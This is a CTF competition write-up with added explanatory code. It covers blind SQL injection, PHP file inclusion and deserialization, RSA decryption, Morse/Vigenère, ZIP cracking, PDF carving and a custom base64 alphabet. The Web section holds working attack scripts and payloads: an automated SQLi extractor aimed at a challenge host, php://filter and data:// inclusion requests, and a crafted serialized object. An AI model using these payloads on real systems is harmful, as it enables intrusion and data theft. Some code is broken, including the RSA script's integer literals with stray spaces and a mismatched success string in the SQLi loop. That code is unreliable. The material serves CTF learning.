Foreword
Only the Web and Misc sections were written by me; the rest was written by the team's master. I am Feiwu, that's it.
Web
Query
Viewing the page source gives the hint login.php, which shows a login form.
Logging in with a universal password (an always-true injection in the username field) produces an echo: Successful login.
That echo is the only feedback the server gives, so it serves as a Boolean oracle. Use a script to perform Boolean-based blind injection:
import requests

url = "http://d574c221d2a0f4da.node.nsctf.cn/login.php"
flag = ''
for i in range(1, 999):
    print(i)
    for j in range(32, 128):
        # database names
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{i},1))/**/like/**/{j},1,0)#"
        # table names
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'ctf'),{i},1))/**/like/**/{j},1,0)#"
        # column names
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'f111'),{i},1))/**/like/**/{j},1,0)#"
        # flag data: the i-th character of the flag has code j?
        s = f"-1'/**/or/**/if(ord(substr((select/**/group_concat(flagdata)/**/from/**/ctf.f111),{i},1))/**/like/**/{j},1,0)#"
        data = {'username': s, 'password': 1}
        r = requests.post(url, data=data)
        if "login successful" in r.text:
            flag += chr(j)
            print(flag)
            break
    else:
        break  # no code matched at position i: end of the string reached
Run the script to get the flag
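To make the oracle the script relies on concrete, here is an added, self-contained re-creation; it is not the challenge's code. A login check concatenates user input into its query (the same flaw as login.php), backed by an in-memory SQLite database with constructed table contents. SQLite has no if()/ord(), so the probe compares unicode(substr(...)) directly, and the extraction loop binary-searches the character code, which cuts the roughly 96 requests per character of the linear scan above to about 7.

```python
import sqlite3

# Constructed stand-in for the challenge's ctf.f111 table (not the real data).
SAMPLE_FLAG = "flag{blind_sqli_demo}"


def build_db() -> sqlite3.Connection:
    """In-memory database standing in for the challenge backend."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES('admin', 'S3cret!')")
    con.execute("CREATE TABLE f111(flagdata TEXT)")
    con.execute("INSERT INTO f111 VALUES(?)", (SAMPLE_FLAG,))
    return con


def vulnerable_login(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Mimics login.php: input is concatenated into the SQL, and the only
    feedback the client gets is whether the login succeeded."""
    sql = f"SELECT 1 FROM users WHERE username='{username}' AND password='{password}'"
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a syntax error just looks like a failed login


def ask(con: sqlite3.Connection, condition: str) -> bool:
    """One boolean probe: -1 never matches a user, so the OR branch decides.
    The trailing comment swallows the rest of the original WHERE clause."""
    return vulnerable_login(con, f"-1' OR ({condition})-- ", "x")


def extract(con: sqlite3.Connection, column: str, table: str, max_len: int = 64) -> str:
    """Blind-extract group_concat(column) from table one character at a time.
    Each character code is found by binary search over 0..127 (~7 probes)."""
    out = ""
    for i in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            probe = f"unicode(substr((SELECT group_concat({column}) FROM {table}),{i},1)) >= {mid}"
            if ask(con, probe):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:  # substr past the end gives '' -> unicode('') is NULL -> every probe false
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = build_db()
    print("universal password works:", vulnerable_login(db, "-1' OR 1=1-- ", "x"))
    print("extracted:", extract(db, "flagdata", "f111"))
```

Against the real target the probe string would be the MySQL form used in the script above; only the oracle function changes, the search logic stays the same.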
Deserialization
Pressing F12 shows the hint:
//The location of the flag is at route.php
$read = $_POST["read"];
$input = $_POST["input"];
if(!isset($read) or !isset($input)) {
    die("NONONO!");
}
if(strpos($read, "f14g")===FALSE) {
    include($read);
    $input = unserialize($input);
    $input2 = clone $input;
    $input2->position = "route.php";
} else {
    die("NONONO!");
}
$read goes straight into include() and is only checked for the substring f14g, so a php://filter payload reads the source of route.php as base64 instead of executing it:
read=php://filter/read=convert.base64-encode/resource=route.php&input=1
Base64-decoding the response gives the code:
<h1>Here can you find the position of the flag!</h1>
<?php
$position = "f14g.php";
$gadget = "h1nt.php";
?>
Read h1nt.php the same way:
read=php://filter/read=convert.base64-encode/resource=h1nt.php&input=1
Decoded:
<?php
class test {
    public $position;
    public function __clone(){
        echo file_get_contents($this->position);
        return $this->position;
    }
}
?>
Now build a serialized test object whose position points at f14g.php, again through php://filter so the file comes back as base64 rather than being executed. The hint code runs clone $input before it overwrites $input2->position with "route.php", so __clone() fires on the copy while position still holds our value and file_get_contents() reads f14g.php:
class test {
    public $position;
    public function __construct($position){
        $this->position = $position;
    }
    public function __clone(){
        echo file_get_contents($this->position);
        return $this->position;
    }
}
$input = new test("php://filter/read=convert.base64-encode/resource=f14g.php");
print(serialize($input).PHP_EOL);
Send both parameters. read=h1nt.php passes the f14g check and, through include(), defines the test class before unserialize() runs, so the object is restored with its __clone() method:
read=h1nt.php&input=O:4:"test":1:{s:8:"position";s:57:"php://filter/read=convert.base64-encode/resource=f14g.php";}
Base64-decode the output to get the flag.
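The serialized string above was produced by running PHP. As an added example (not part of the writeup), the same payload can be generated without a PHP interpreter; the point worth remembering is that PHP's s:N: prefix counts bytes, not characters, so a hand-edited payload with non-ASCII content or a stray space breaks unserialize(). The helper also handles arrays and nested values, which goes beyond what this challenge needs.

```python
def php_serialize(value) -> str:
    """Serialize Python values the way PHP's serialize() does.
    Strings are length-prefixed in BYTES (UTF-8), not characters, which is
    the detail that most often breaks hand-written payloads."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, float):
        return f"d:{value!r};"
    if isinstance(value, str):
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, (list, tuple)):
        # PHP arrays are ordered maps; a list becomes integer keys 0..n-1
        body = "".join(php_serialize(i) + php_serialize(v) for i, v in enumerate(value))
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"unsupported type {type(value).__name__}")


def php_serialize_object(class_name: str, props: dict) -> str:
    """O:<len>:"<class>":<count>:{<props>} for an object with public properties."""
    body = "".join(php_serialize(k) + php_serialize(v) for k, v in props.items())
    return f'O:{len(class_name.encode("utf-8"))}:"{class_name}":{len(props)}:{{{body}}}'


def clone_payload(resource: str) -> str:
    """The input= value for the challenge: a test object whose position is
    the php://filter URL that __clone() will hand to file_get_contents()."""
    return php_serialize_object(
        "test", {"position": f"php://filter/read=convert.base64-encode/resource={resource}"}
    )


if __name__ == "__main__":
    print(clone_payload("f14g.php"))
```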
CodeCheck
F12 shows the hint:
$flag = "************";
if(!isset($_GET['a']) or !isset($_GET['b'])) {
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag") {
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c']) {
    die("NONONO");
}
if(isset($_GET['d'])) {
    include($_GET['d']);
}
So the file passed as a must have the content flag, the content of the file passed as b must equal the parameter c, and then d is passed to include() to read a file. No upload is needed: the data:// wrapper lets file_get_contents() read its contents straight from the URL, and php://filter makes include() return the target as base64 instead of executing it.
GET parameters:
http://96d9f0fc6195d0b3.node.nsctf.cn/?a=data://text/plain,flag&b=data://text/plain,flag&c=flag&d=php://filter/read=convert.base64-encode/resource=index.php
Base64-decode the output to get the flag.
Crypto
secret
e and phi are not coprime, so e has no inverse modulo phi and the usual d does not exist. The script handles this directly: with t = gcd(e, phi), invert only the coprime part e/t, which yields m^t mod n, then take the t-th root (valid when m^t < n):
import gmpy2
from Crypto.Util.number import long_to_bytes

p = 134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656065560178592346659948800891455240736405480828554486592172443394370831
q = 14784744453415212899754693160229226609474088934715419242055490465181334091574432810410006537329434672396435673643670993487174116132828694415024273344554222829303640465755616884472352181583668938718485687109102543489671060568859484740005168636 1372872763001355411405782508020591933546964183881743133374126947753
n = 198501633144015525026544777517958899623243600649245949482311680927419516752629335736910709938637632909629451903724002625265952244374639692383329275640852372717192986268779177925956037444338814099630462920952056868790150295866593848667195149481816824277445553133828388057407236640508469500019163326313976062777038884929276358678705387095969939874392252478161379751566571195093720230835077727303324827752584446114627710958963806449970113412650217191890982620727563420691892621881274280790174180481183451800742808581609344831149669683651847884200910509332734175444930012149318765886537818244754720283832564886384419274 3
c = 139133963667550106070434775525772682779282413191012153816623314980460806259028312024866460207675689218811851248949602428672541629276054162284601083990874069892580370176396191955067110900128774541313835688327506061029011107820455292679405044713228473648080947906626967854705948922447161372037818902842168740354863025060422634532555804753807429592013140037885536929779143579969821183285871191241441812907533893941492353810453896968414714839473106633299938730461231345871496613479997749581050911038063757023870841493095423515410211401110484082481214084016019791085107588915955500546997198017086462324271989022719536 73874
e = 28

n = p * q
phi = (p - 1) * (q - 1)
t = gmpy2.gcd(e, phi)          # the factor e shares with phi
t1 = e // t                    # coprime part of e
dt1 = gmpy2.invert(t1, phi)    # inverse of the coprime part
mt1 = pow(c, dt1, n)           # = m^t mod n
s, m = gmpy2.iroot(mt1, t)     # t-th root; the second value is the exactness flag
print(long_to_bytes(s))
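The trick above is general, so here is an added, dependency-free version (not the writeup's script): it checks that e/t really is coprime to phi, verifies the root is exact, and, if m^t was slightly larger than n, tries m^t + k·n for small k before giving up. The key parameters are constructed toy values built from Mersenne primes, chosen so that gcd(28, phi) = 4; they are not the challenge's numbers.

```python
from math import gcd


def iroot(x: int, k: int):
    """Integer k-th root by Newton iteration: returns (r, exact) with r = floor(x**(1/k))."""
    if x < 0 or k < 1:
        raise ValueError("x must be >= 0 and k >= 1")
    if x < 2:
        return x, True
    r = 1 << ((x.bit_length() + k - 1) // k)  # start at or above the true root
    while True:
        nr = ((k - 1) * r + x // pow(r, k - 1)) // k
        if nr >= r:
            break
        r = nr
    return r, pow(r, k) == x


def rsa_decrypt_noncoprime(c: int, e: int, p: int, q: int, max_wraps: int = 1000) -> int:
    """Recover m when gcd(e, phi) = t > 1.

    Write e = t * e1 with gcd(e1, phi) = 1.  Then c^(e1^-1 mod phi) = m^t mod n,
    and if m^t < n (short message) the exact t-th root of that value is m.
    If m^t wrapped around n a few times, m^t = (m^t mod n) + k*n for small k.
    """
    n = p * q
    phi = (p - 1) * (q - 1)
    t = gcd(e, phi)
    e1 = e // t
    if gcd(e1, phi) != 1:
        raise ValueError("e/t still shares a factor with phi; this trick needs gcd(e/t, phi) = 1")
    d1 = pow(e1, -1, phi)        # modular inverse (Python >= 3.8)
    mt = pow(c, d1, n)           # congruent to m^t modulo n
    for k in range(max_wraps):
        m, exact = iroot(mt + k * n, t)
        if exact:
            return m
    raise ValueError("no exact t-th root found; m^t is too large relative to n")


# Constructed toy key (Mersenne primes 2^89-1 and 2^107-1), not the challenge values.
# 7 divides neither p-1 nor q-1 and both are 2*odd, so gcd(28, phi) = 4 and e1 = 7.
TOY_P = (1 << 89) - 1
TOY_Q = (1 << 107) - 1
TOY_E = 28


def toy_roundtrip(msg: bytes) -> bytes:
    """Encrypt msg under the toy key with e = 28 and decrypt it via the gcd trick."""
    n = TOY_P * TOY_Q
    m = int.from_bytes(msg, "big")
    c = pow(m, TOY_E, n)
    rec = rsa_decrypt_noncoprime(c, TOY_E, TOY_P, TOY_Q)
    return rec.to_bytes((rec.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    print(toy_roundtrip(b"ns{ok}"))
```

For the challenge values, substitute p, q, c and e = 28; the only assumption is that the flag, raised to the power t, does not exceed n by more than max_wraps multiples, which holds for a short flag.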
Morse’s Notebook
secret.txt contains a sentence; take out only the punctuation marks:
. ,,. ! . ,! . . . ! . . . ! . ,,! ,,,! . ,. ! ,. . ! . . ! . . . ! ,. ,. ! ,,,! ,. ! ,,. ! . ,. ! . ,! ,! . . .
Guessing Morse code (. as dot, , as dash, ! between letters) and decoding on an online site gives:
PASSWORDISCONGRATS
So the ciphertext in the attachment is presumably a Vigenère cipher; trying the key congrats decrypts it.
Ciphey solves it and produces the flag.
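As an added example (not the writeup's tooling), here are both steps offline: a Morse decoder that accepts arbitrary symbols for dot, dash and letter separator, so the punctuation string can be fed in as-is, and a Vigenère routine for the second stage. The Vigenère inputs used to exercise it are constructed; the attachment's ciphertext is not reproduced in the writeup.

```python
import string

MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}


def morse_decode(text: str, dot: str = ".", dash: str = ",", sep: str = "!") -> str:
    """Decode Morse written with arbitrary symbols: `dot`/`dash` for the two
    marks and `sep` between letters. Other characters (here the spaces) are
    ignored, and an unknown pattern decodes to '?' instead of aborting."""
    out = []
    for letter in text.split(sep):
        code = "".join("." if ch == dot else "-" for ch in letter if ch in (dot, dash))
        if code:
            out.append(MORSE.get(code, "?"))
    return "".join(out)


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Classic Vigenère over A-Z. Case is preserved; non-letters pass through
    without consuming a key character (the usual tool behaviour)."""
    shifts = [ord(k.upper()) - 65 for k in key if k in string.ascii_letters]
    if not shifts:
        raise ValueError("key needs at least one letter")
    out, i = [], 0
    for ch in text:
        if ch in string.ascii_letters:
            base = 65 if ch.isupper() else 97
            s = shifts[i % len(shifts)]
            if decrypt:
                s = -s
            out.append(chr((ord(ch) - base + s) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


# The punctuation extracted from secret.txt, as quoted in the writeup above.
PUNCT = ". ,,. ! . ,! . . . ! . . . ! . ,,! ,,,! . ,. ! ,. . ! . . ! . . . ! ,. ,. ! ,,,! ,. ! ,,. ! . ,. ! . ,! ,! . . ."

if __name__ == "__main__":
    password = morse_decode(PUNCT)
    print(password)
    # constructed round trip with the recovered key
    ct = vigenere("ATTACK", "congrats")
    print(ct, vigenere(ct, "congrats", decrypt=True))
```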
RSA
Factoring n-1 on an online factoring site directly gives g (the middle factor):
2 * 1346104232461691 * 13570850594633462506426369052182298554140635599543685835372377476383038708650421475723391142118956001358520246769650699398490037618758005241062608387057439283872260149565854577827352267289963736282502923131251179400580891491236925451166755184695335564693793568286112036468975877609637392241679
Use the script to decrypt:
from Crypto.Util.number import inverse, long_to_bytes

g = 1346104232461691
n = 36535558847082719901201561031181835346574576610950713924924272947759193576365817762980927638691696601293089537315055413746788190208875234794229119049056299551864869870291634941246362436491006904347559559494705922259007299126640817275929491680601926404543198957206717290905220235571289759182878331893962038379
c = 532997872940452282189043430008002793694788439822465302532208754231005799057972378308576109082463996551992533174546386979606697890310597738637156771564229
a = 2694858406312563434474553988904403597551484373358339092528913028454100111881368126493990657117571672510331411186745639563619323775673115439
e = 65537

d = inverse(e, (a - 1) * (g - 1))
plaintext = pow(c, d, a * g)
decrypted_message = long_to_bytes(plaintext)
print("Decrypted message:", decrypted_message.decode())
Running it gives the flag:
Decrypted message: flag{p01la4d_rHo_a1gOr1thM_r1gh4}
Misc
ZIP
The attachment is a password-protected archive, but it comes with a hint:
The art of 0 and 1, and it will remain shorter than 9.
So the password consists only of the digits 0 and 1 and has no more than 9 digits, a keyspace of 2 + 4 + ... + 512 = 1022 candidates.
Generate that dictionary with a dictionary generator, then run a dictionary attack on the archive.
The password falls out, and with it the flag.
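Here is an added, self-contained version of the attack (not the tooling used in the writeup): the 0/1 wordlist, a cracking loop on Python's zipfile module, and, since zipfile can read but not write traditional PKWARE (ZipCrypto) archives, a minimal ZipCrypto writer so there is a constructed sample archive to crack offline. The archive name, contents and password are constructed for the demo.

```python
import io
import struct
import zipfile
import zlib
from itertools import product


def binary_wordlist(max_len: int = 9) -> list:
    """Every string over {0,1} of length 1..max_len: 2 + 4 + ... + 512 = 1022 words."""
    return ["".join(bits) for n in range(1, max_len + 1) for bits in product("01", repeat=n)]


def crack_zip(zip_bytes: bytes, words):
    """Try each candidate against the first entry; returns (password, plaintext) or None.
    A wrong ZipCrypto password fails the 1-byte header check (RuntimeError) about
    255 times in 256 and the CRC check (BadZipFile) otherwise, so catch both."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        name = zf.namelist()[0]
        for w in words:
            try:
                return w, zf.read(name, pwd=w.encode())
            except (RuntimeError, zipfile.BadZipFile):
                continue
    return None


# --- Minimal ZipCrypto writer, constructed here so the demo has something to attack.

def _crc32_byte(k: int, b: int) -> int:
    """One-byte update of the raw (non-inverted) CRC-32 register used by ZipCrypto."""
    return zlib.crc32(bytes([b]), k ^ 0xFFFFFFFF) ^ 0xFFFFFFFF


class _ZipCryptoKeys:
    def __init__(self, pwd: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in pwd:
            self.update(b)

    def update(self, b: int) -> None:
        self.k0 = _crc32_byte(self.k0, b)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_byte(self.k2, self.k1 >> 24)

    def stream_byte(self) -> int:
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF


def make_encrypted_zip(name: bytes, data: bytes, pwd: bytes) -> bytes:
    """One stored (uncompressed) entry protected with traditional PKWARE encryption."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    keys = _ZipCryptoKeys(pwd)
    enc = bytearray()
    # 12-byte encryption header; its last byte must equal the high byte of the CRC,
    # which is the one-byte password check the reader performs before decrypting.
    for p in bytes(11) + bytes([crc >> 24]) + data:
        enc.append(p ^ keys.stream_byte())
        keys.update(p)
    flags, method, mtime, mdate = 0x0001, 0, 0, 0x21  # encrypted, stored, 1980-01-01
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, method, mtime, mdate,
                        crc, len(enc), len(data), len(name), 0) + name
    cdir = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, method, mtime, mdate,
                       crc, len(enc), len(data), len(name), 0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(cdir), len(local) + len(enc), 0)
    return local + bytes(enc) + cdir + eocd


if __name__ == "__main__":
    archive = make_encrypted_zip(b"flag.txt", b"flag{constructed_sample}", b"101101")
    print(crack_zip(archive, binary_wordlist()))
```

The same crack_zip loop works on the real attachment by reading it from disk; with only 1022 candidates it finishes in well under a second, which is why the hint makes the archive effectively unprotected.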
Simple Document
Opening the file in 010 Editor reveals a PDF file header inside it.
Carve the PDF out manually and save it as a .pdf file.
The PDF appears to be empty, so
convert it to a Word document and change the text colour and font; the hidden text becomes visible and gives the flag.
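The manual carving done in 010 Editor above can be scripted. As an added example (not part of the writeup), this carver finds every %PDF- header in a blob and cuts to the last %%EOF before the next header, so a PDF with incremental updates (several %%EOF markers) is carved whole. The blob it runs on is constructed; the challenge file is not reproduced here.

```python
def carve_pdfs(blob: bytes) -> list:
    """Return every PDF embedded in blob, from each '%PDF-' header to the
    '%%EOF' trailer that follows it (trailer marker included).
    Incremental updates append extra %%EOF markers, so the LAST one before the
    next header (or end of data) is used; a header without any trailer is skipped."""
    starts = []
    pos = blob.find(b"%PDF-")
    while pos != -1:
        starts.append(pos)
        pos = blob.find(b"%PDF-", pos + 5)
    found = []
    for idx, start in enumerate(starts):
        limit = starts[idx + 1] if idx + 1 < len(starts) else len(blob)
        end = blob.rfind(b"%%EOF", start, limit)
        if end == -1:
            continue  # truncated: header but no trailer
        found.append(blob[start:end + len(b"%%EOF")])
    return found


# Constructed test blob: leading junk, a tiny PDF-shaped payload (correct header and
# trailer, not a complete document), trailing junk. Not the challenge file.
SAMPLE_PDF = b"%PDF-1.4\n1 0 obj<</Type/Catalog>>endobj\ntrailer<</Root 1 0 R>>\n%%EOF"
SAMPLE_BLOB = b"\x00" * 16 + b"OFFICE JUNK" + SAMPLE_PDF + b"\r\nmore junk\x00\x01"

if __name__ == "__main__":
    for i, pdf in enumerate(carve_pdfs(SAMPLE_BLOB)):
        out = f"carved_{i}.pdf"
        with open(out, "wb") as fh:
            fh.write(pdf)
        print(f"{out}: {len(pdf)} bytes")
```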
Mobile
peacock
1. The main logic is in test, and test loads the test library.
2. Find libtest.so under lib and open it in IDA.
The Strings window shows a base64-encoded ciphertext and a base64 alphabet table.
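When a native library carries its own 64-character table next to the ciphertext, the encoding is usually standard base64 with a substituted alphabet. As an added example (not from the writeup or the APK), this decoder maps the custom table back onto the standard one and reuses the standard decoder, repairing stripped padding on the way. The table and ciphertext below are constructed; the real table from libtest.so is not reproduced in the writeup.

```python
import base64

STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def b64_custom_decode(data: str, table: str) -> bytes:
    """Decode base64 that used a non-standard 64-character table: translate each
    symbol back to the standard alphabet, fix padding, then decode normally.
    Assumes '=' is still the pad character (tables that reuse '=' need a different path)."""
    if len(table) != 64 or len(set(table)) != 64:
        raise ValueError("table must be 64 distinct characters")
    mapped = data.rstrip("=").translate(str.maketrans(table, STD_ALPHABET))
    mapped += "=" * (-len(mapped) % 4)
    return base64.b64decode(mapped, validate=True)


def b64_custom_encode(raw: bytes, table: str) -> str:
    """Inverse of b64_custom_decode, used here to build test vectors."""
    std = base64.b64encode(raw).decode("ascii")
    return std.translate(str.maketrans(STD_ALPHABET, table))


# Constructed table (the standard alphabet rotated by 13) and ciphertext for the demo.
DEMO_TABLE = STD_ALPHABET[13:] + STD_ALPHABET[:13]
DEMO_CIPHERTEXT = b64_custom_encode(b"flag{custom_table_demo}", DEMO_TABLE)

if __name__ == "__main__":
    print("ciphertext:", DEMO_CIPHERTEXT)
    print("decoded:   ", b64_custom_decode(DEMO_CIPHERTEXT, DEMO_TABLE))
```

In practice, copy the 64-character string and the ciphertext out of IDA's Strings window into `table` and `data`; if the result is still garbage, check whether the library also XORs or swaps bytes before or after the table lookup.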